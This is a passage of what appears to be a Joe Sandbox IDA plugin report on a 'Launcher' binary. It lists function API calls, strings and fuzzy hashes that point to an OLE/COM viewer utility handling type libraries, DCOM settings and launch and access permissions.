                                                                                                      • Part of subcall function 0067D91D: __EH_prolog3.LIBCMT ref: 0067D924
                                                                                                      • Part of subcall function 0067D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0067B9B7,?,00000000,00000000,00000000), ref: 0067D942
                                                                                                      • Part of subcall function 0067D91D: #540.MFC42U ref: 0067D94F
                                                                                                      • Part of subcall function 0067D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 0067D96C
                                                                                                      • Part of subcall function 0067D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 0067D97F
                                                                                                      • Part of subcall function 0067D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D98C
                                                                                                      • Part of subcall function 0067D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 0067D997
                                                                                                      • Part of subcall function 0067D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0067D99F
                                                                                                      • Part of subcall function 0067D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 0067D9AA
                                                                                                      • Part of subcall function 0067D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0067DA13
                                                                                                    • #800.MFC42U(?,00000000), ref: 00671296
                                                                                                    • DragFinish.SHELL32(?), ref: 006712AF
                                                                                                    Strings
                                                                                                    • The file droped (%s) is not a valid persistent OLE object or Type Library file., xrefs: 00671271
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#2810#540Drag$#1662#538FileQuery$#1165#1197#2644#2859#858#922ActiveBindCreateDisplayFinishFormatFreeH_prolog3H_prolog3_LoadLocalMessageNameParseTypeWindowlstrcpy
                                                                                                    • String ID: The file droped (%s) is not a valid persistent OLE object or Type Library file.
                                                                                                    • API String ID: 1998644663-3375467908
                                                                                                    • Opcode ID: 3dc9c3110fd08580b3a019d6b8c823db0be50bb9237fb6ca922fc70373c8ad38
                                                                                                    • Instruction ID: e3a1bfb1691999d053250ee0003d26b29f9185772cdfed056dafad4dd1eed305
                                                                                                    • Opcode Fuzzy Hash: 3dc9c3110fd08580b3a019d6b8c823db0be50bb9237fb6ca922fc70373c8ad38
                                                                                                    • Instruction Fuzzy Hash: 2D419E71901129ABCB51EBA0DC89BDDB77AAF18320F1082D5E519A7191DF30AF85CF94
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00670826
                                                                                                    • #4219.MFC42U(Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo,Launch Permissions,00000004), ref: 0067083E
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00670853
                                                                                                    • SetCursor.USER32(00000000), ref: 0067085A
                                                                                                    • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0067088A
                                                                                                    • #2634.MFC42U(00000000), ref: 00670897
                                                                                                    • #2634.MFC42U(00000000,00000000), ref: 006708A3
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 006708AE
                                                                                                    • SetCursor.USER32(00000000), ref: 006708B5
                                                                                                    • #4118.MFC42U ref: 006708C3
                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 006708DB
                                                                                                    • #5977.MFC42U ref: 006708E4
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 006708F2
                                                                                                    Strings
                                                                                                    • Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo, xrefs: 00670837
                                                                                                    • Launch Permissions, xrefs: 00670832
                                                                                                    • LaunchPermission, xrefs: 00670860
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorMessageSend$#2634Load$#4118#4219#5977
                                                                                                    • String ID: Launch Permissions$LaunchPermission$Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo
                                                                                                    • API String ID: 791338786-3477396783
                                                                                                    • Opcode ID: 1439b428030ec5201d5002aa349f27543ba56418c301fead8b0cb0316c184a19
                                                                                                    • Instruction ID: 5edeee61de8ce3c75aec454fcc120298e7c6214b79c39fcfa47ae96d323fdcd2
                                                                                                    • Opcode Fuzzy Hash: 1439b428030ec5201d5002aa349f27543ba56418c301fead8b0cb0316c184a19
                                                                                                    • Instruction Fuzzy Hash: 9C216A31640211BAEB616F61CC4EEDB3A2BEF46761F424074FA0E991A6CFA14846C6B0
                                                                                                    APIs
                                                                                                    • #540.MFC42U(800E373A,?,?,?,?,?,006804CF,000000FF), ref: 0066EBFF
                                                                                                    • #540.MFC42U(800E373A,?,?,?,?,?,006804CF,000000FF), ref: 0066EC07
                                                                                                    • #4155.MFC42U(00000004,800E373A,?,?,?,?,?,006804CF,000000FF), ref: 0066EC11
                                                                                                    • #4155.MFC42U(00000008,00000004,800E373A,?,?,?,?,?,006804CF,000000FF), ref: 0066EC1B
                                                                                                    • #6398.MFC42U(?,?,?,00000008,00000004,800E373A,?,?,?,?,?,006804CF,000000FF), ref: 0066EC32
                                                                                                    • #861.MFC42U(ViewHiddenComCats,?,?,?,00000008,00000004,800E373A,?,?,?,?,?,006804CF,000000FF), ref: 0066EC3F
                                                                                                    • #6398.MFC42U(?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,800E373A,?,?,?,?,?,006804CF), ref: 0066EC4F
                                                                                                    • #861.MFC42U(ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,800E373A), ref: 0066EC5C
                                                                                                    • #6398.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,800E373A), ref: 0066EC6C
                                                                                                    • #800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,800E373A), ref: 0066EC74
                                                                                                    • #800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,800E373A), ref: 0066EC7C
                                                                                                    • #800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,800E373A), ref: 0066EC84
                                                                                                    • #652.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,800E373A), ref: 0066EC8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #6398#800$#4155#540#861$#652
                                                                                                    • String ID: ExpertMode$ViewHiddenComCats$f
                                                                                                    • API String ID: 800799730-2566507215
                                                                                                    • Opcode ID: b6cf7571c2bfa8049a0e2d5f10b1ff5699df075af2c37804620ec230165cb4d1
                                                                                                    • Instruction ID: 46f1722f6e032c326077e6a37d3d0b9994d2287ea5f10a3953cef74be975aab2
                                                                                                    • Opcode Fuzzy Hash: b6cf7571c2bfa8049a0e2d5f10b1ff5699df075af2c37804620ec230165cb4d1
                                                                                                    • Instruction Fuzzy Hash: 0B214C31900515ABCB56EB90CC42DBEB7B7FF54710F00492CF516672E1EB716A08CB15
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00670F1A
                                                                                                    • #355.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00670F3C
                                                                                                    • #2507.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00670F4A
                                                                                                    • #3494.MFC42U(?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00670F6B
                                                                                                    • LoadTypeLib.OLEAUT32(?,?), ref: 00670F89
                                                                                                    • #540.MFC42U(0066A8E9), ref: 00670FA2
                                                                                                    • #3494.MFC42U(?,0066A8E9), ref: 00670FB8
                                                                                                    • #2810.MFC42U(?,LoadTypeLib( %s ) failed.,00000000,?,0066A8E9), ref: 00670FCF
                                                                                                    • #800.MFC42U ref: 00670FE1
                                                                                                    • #800.MFC42U(?), ref: 00670FF9
                                                                                                    • #800.MFC42U(?,00669ECC,?,0066A8E9), ref: 00671034
                                                                                                    • #800.MFC42U(?,00669ECC,?,0066A8E9), ref: 0067103F
                                                                                                    • #641.MFC42U(?,00669ECC,?,0066A8E9), ref: 0067104A
                                                                                                    Strings
                                                                                                    • *.tlb, xrefs: 00670F35
                                                                                                    • TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|, xrefs: 00670F22
                                                                                                    • LoadTypeLib( %s ) failed., xrefs: 00670FC9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#3494$#2507#2810#355#540#641H_prolog3_LoadType
                                                                                                    • String ID: *.tlb$LoadTypeLib( %s ) failed.$TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|
                                                                                                    • API String ID: 2313197997-4003309560
                                                                                                    • Opcode ID: cc51588ea7266b261d75fc128cfc250c2b95d0fdd632e51497525150269db87d
                                                                                                    • Instruction ID: 52449e79ee9ac4523928c5ad1b6c222445d1564ebaf2f94e53ee66ff98783c56
                                                                                                    • Opcode Fuzzy Hash: cc51588ea7266b261d75fc128cfc250c2b95d0fdd632e51497525150269db87d
                                                                                                    • Instruction Fuzzy Hash: 242160308006689BCB66EB50CC82AEDB77DAF14705F4884E9F10D661A1DF751F88CF15
                                                                                                    APIs
                                                                                                    • #5031.MFC42U(?,?,?), ref: 0066D301
                                                                                                    • #6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 0066D34C
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0066D320
                                                                                                      • Part of subcall function 0066C8A6: ScreenToClient.USER32(?,?), ref: 0066C8B7
                                                                                                      • Part of subcall function 0066C8A6: ScreenToClient.USER32(?,?), ref: 0066C8C4
                                                                                                      • Part of subcall function 0066C8A6: #3133.MFC42U(?,?,?,0066C46E,?), ref: 0066C8CC
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0066D36B
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066D38B
                                                                                                    • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 0066D3BC
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0066D3E6
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066D406
                                                                                                    • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 0066D430
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0066D44F
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066D46F
                                                                                                    • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 0066D499
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0066D4B8
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066D4D8
                                                                                                    • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 0066D502
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0066D521
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066D541
                                                                                                    • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 0066D568
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #6193RectWindow$MessageSend$ClientScreen$#3133#5031
                                                                                                    • String ID:
                                                                                                    • API String ID: 4086507556-0
                                                                                                    • Opcode ID: 1ab159bfbe498c5341d630bbe2671cfe8f93601f680b940be086bb12908a141e
                                                                                                    • Instruction ID: 57bba08806781677893e804a5d43d4551fe9e9813b13f8ca4e81ddcb3ac7b931
                                                                                                    • Opcode Fuzzy Hash: 1ab159bfbe498c5341d630bbe2671cfe8f93601f680b940be086bb12908a141e
                                                                                                    • Instruction Fuzzy Hash: 0081327064020AAFEB20DFB5CC89FEF7BBAEB44700F504528F655AA1E4DB706904DB54
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001,?,?,0067BA6A,?), ref: 0067C8C5
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,0067BA6A,?), ref: 0067C8CC
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,0067BA6A,?,0067BA6A,?), ref: 0067C8E7
                                                                                                    • GetLastError.KERNEL32(?,0067BA6A,?), ref: 0067C8ED
                                                                                                    • CloseHandle.KERNEL32(?,0067BA6A,?), ref: 0067C921
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2078281146-0
                                                                                                    • Opcode ID: 7cc2d65dcbd75353210004a278e0c7f3b9bf12579dfce15e55c9bc7c56f4544f
                                                                                                    • Instruction ID: aa025b283bd83c4dc1d341a9e43941cdcd0d4ca7b05d94cc17cbc7526db88a78
                                                                                                    • Opcode Fuzzy Hash: 7cc2d65dcbd75353210004a278e0c7f3b9bf12579dfce15e55c9bc7c56f4544f
                                                                                                    • Instruction Fuzzy Hash: 7031D436500116FFDB115BA4EC08AAE7B7BFB45321B219229FA09E6220DF358940DB61
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0066C086
                                                                                                    • #4219.MFC42U(Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo,Access Permissions,00000004), ref: 0066C09E
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0066C0B3
                                                                                                    • SetCursor.USER32(00000000), ref: 0066C0BA
                                                                                                    • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0066C0EA
                                                                                                    • #2634.MFC42U(00000000), ref: 0066C0F7
                                                                                                    • #2634.MFC42U(00000000,00000000), ref: 0066C103
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0066C10E
                                                                                                    • SetCursor.USER32(00000000), ref: 0066C115
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0066C12D
                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0066C13D
                                                                                                    Strings
                                                                                                    • Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo, xrefs: 0066C097
                                                                                                    • Access Permissions, xrefs: 0066C092
                                                                                                    • AccessPermission, xrefs: 0066C0C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorMessageSend$#2634Load$#4219
                                                                                                    • String ID: Access Permissions$AccessPermission$Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo
                                                                                                    • API String ID: 2901272449-2859256857
                                                                                                    • Opcode ID: b34600f40f08c0e87bf1af9854a97becd1bc66ffb52aecd592480fffb7f462f8
                                                                                                    • Instruction ID: 535f3cbec60fc23e2439ed1d99e60cba791174bed7a87a064bcd903a55630293
                                                                                                    • Opcode Fuzzy Hash: b34600f40f08c0e87bf1af9854a97becd1bc66ffb52aecd592480fffb7f462f8
                                                                                                    • Instruction Fuzzy Hash: FD117232140611BBE7216F61EC8EEE73B2BDF87B61F125075FA0999096CBA10404C6B0
                                                                                                    APIs
                                                                                                    • RegOpenKeyW.ADVAPI32(80000000,AppID,00000000), ref: 00675653
                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000100), ref: 0067569A
                                                                                                    • wsprintfW.USER32 ref: 00675754
                                                                                                    • RegQueryValueW.ADVAPI32(80000000,?,?,00000100), ref: 00675777
                                                                                                    • CLSIDFromString.OLE32(00000000,-00000008), ref: 006757CF
                                                                                                    • lstrcpyW.KERNEL32(-00000084,?), ref: 0067584A
                                                                                                    • lstrlenW.KERNEL32(?), ref: 006758A8
                                                                                                    • wsprintfW.USER32 ref: 006758C5
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 006758FE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$CloseEnumFromOpenQueryStringValuelstrcpylstrlen
                                                                                                    • String ID: '$AppID$AppID\%s$[AppID: %s]
                                                                                                    • API String ID: 1953670596-3682975055
                                                                                                    • Opcode ID: c80c7d57c0fe59ba1452a7ce9af043adf81cc658196cb8cae05c08fa8c7800d6
                                                                                                    • Instruction ID: 6b9fe20df79624d0404e18c3f3cb38b50363e6faac2a1a56ef6e5c6ecc1d3e09
                                                                                                    • Opcode Fuzzy Hash: c80c7d57c0fe59ba1452a7ce9af043adf81cc658196cb8cae05c08fa8c7800d6
                                                                                                    • Instruction Fuzzy Hash: 3481C4B1900A2C9FDB64CF64DC45BEAB7B9BB08306F1055E9E509E6290DB749F84CF50
                                                                                                    APIs
                                                                                                      • Part of subcall function 0067D6F5: RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,0067D6E4,80000000,?,?,?,?,?), ref: 0067D70D
                                                                                                      • Part of subcall function 0067D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,0067D6E4,?,?,?,0067D6E4,80000000,?,?,?,?,?), ref: 0067D72C
                                                                                                      • Part of subcall function 0067D6F5: RegCloseKey.ADVAPI32(?,?,?,?,0067D6E4,80000000,?,?,?,?,?,?,?,?), ref: 0067D738
                                                                                                    • lstrcmpiW.KERNEL32(?,00662778,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 0067B6E0
                                                                                                    • lstrcmpiW.KERNEL32(?,00662778,80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,?,00000100,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 0067B726
                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0067B749
                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0067B76E
                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0067B7B1
                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0067B7DC
                                                                                                    • #5273.MFC42U(80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,00662778), ref: 0067B809
                                                                                                    • #1197.MFC42U(These changes will take effect after you restart your computer.,00000000,00000000), ref: 0067B81F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrcmpi$#1197#5273CloseOpenQueryValue
                                                                                                    • String ID: EnableDCOM$EnableRemoteConnect$SOFTWARE\MICROSOFT\OLE$These changes will take effect after you restart your computer.
                                                                                                    • API String ID: 2271089683-166272277
                                                                                                    • Opcode ID: 61992e871743f093c99d96eaeba6c74cc9a0b50381ad87b38bf32dff7cc19403
                                                                                                    • Instruction ID: 8c6a30370384f637bc9f5b188bae84cdf8efcf4da7bfb0c9d3946d9ccb29c7f3
                                                                                                    • Opcode Fuzzy Hash: 61992e871743f093c99d96eaeba6c74cc9a0b50381ad87b38bf32dff7cc19403
                                                                                                    • Instruction Fuzzy Hash: 9F41EC7078031676EB305B20CD87FBA776FEB04B04F119265FA1DB5281DBB1AD459B48
                                                                                                    APIs
                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00683B00,00000FA0), ref: 0067F1B0
                                                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 0067F1BB
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0067F1CC
                                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0067F1DE
                                                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0067F1EC
                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0067F21E
                                                                                                    • DeleteCriticalSection.KERNEL32(00683B00,00000007), ref: 0067F245
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0067F255
                                                                                                    Strings
                                                                                                    • kernel32.dll, xrefs: 0067F1C7
                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0067F1B6
                                                                                                    • WakeAllConditionVariable, xrefs: 0067F1E4
                                                                                                    • SleepConditionVariableCS, xrefs: 0067F1D8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                    • API String ID: 2565136772-3242537097
                                                                                                    • Opcode ID: d93c6edff97071fce7a0d01eb63e3e0d0fe4d682b8b22db8a84ded5bae67b4e4
                                                                                                    • Instruction ID: 67817e2a28ff8d040f05beabd33e38c8b4f2f2f49a73e969ec323bcacb5bdb3d
                                                                                                    • Opcode Fuzzy Hash: d93c6edff97071fce7a0d01eb63e3e0d0fe4d682b8b22db8a84ded5bae67b4e4
                                                                                                    • Instruction Fuzzy Hash: 8E01A175A447227BC72027B4BC0DE6B3A9BAF94F11B165224FD08E2351EF70CE008BA5
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0066F29A
                                                                                                    • lstrcpyW.KERNEL32(?,Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|,00000548), ref: 0066F2AD
                                                                                                    • #355.MFC42U(00000001,00000000,006621A0,00001804,?), ref: 0066F2D0
                                                                                                    • #2507.MFC42U ref: 0066F2E8
                                                                                                    • #3494.MFC42U(?), ref: 0066F2FF
                                                                                                    • #858.MFC42U(00000000,?), ref: 0066F30F
                                                                                                    • #800.MFC42U(00000000,?), ref: 0066F31D
                                                                                                    • #6330.MFC42U(00000000,00000000,?), ref: 0066F325
                                                                                                    • #800.MFC42U ref: 0066F330
                                                                                                    • #641.MFC42U ref: 0066F33B
                                                                                                    Strings
                                                                                                    • Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|, xrefs: 0066F2A1
                                                                                                    • Open COM Surrogate Server, xrefs: 0066F2DE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#2507#3494#355#6330#641#858H_prolog3_lstrcpy
                                                                                                    • String ID: Executable Files (*.exe)|*.exe|All Files (*.*)|*.*|$Open COM Surrogate Server
                                                                                                    • API String ID: 2485399651-276578773
                                                                                                    • Opcode ID: 7b5354d972f4ae83086d84be20d196720d8c506dd13cfc11eadbcee501e5a8c0
                                                                                                    • Instruction ID: 3b18fe0cf12a9900fd27717a8165ea62f9789358370388c3f6ced156a1d49319
                                                                                                    • Opcode Fuzzy Hash: 7b5354d972f4ae83086d84be20d196720d8c506dd13cfc11eadbcee501e5a8c0
